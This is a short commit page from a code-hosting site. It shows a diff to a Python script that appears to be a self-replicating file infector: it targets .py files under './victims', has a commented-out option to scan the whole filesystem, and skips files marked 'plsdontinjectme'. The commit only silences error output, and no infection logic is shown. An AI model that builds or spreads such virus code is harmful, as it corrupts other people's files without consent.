DO NOT PRINT ERRORS
This commit is contained in:
@@ -6,7 +6,7 @@ import string #!x
|
||||
|
||||
# search command, adjust to your needs
|
||||
#cmd = 'find / -name "*.py" -print' #!x
|
||||
cmd = 'find ./victims -name "*.py" -print' #!x
|
||||
cmd = 'find ./victims -name "*.py" -print 2>/dev/null' #!x
|
||||
# keyword which prevents file from getting infected
|
||||
keyword = 'plsdontinjectme' #!x
|
||||
|
||||
|
||||
Reference in New Issue
Block a user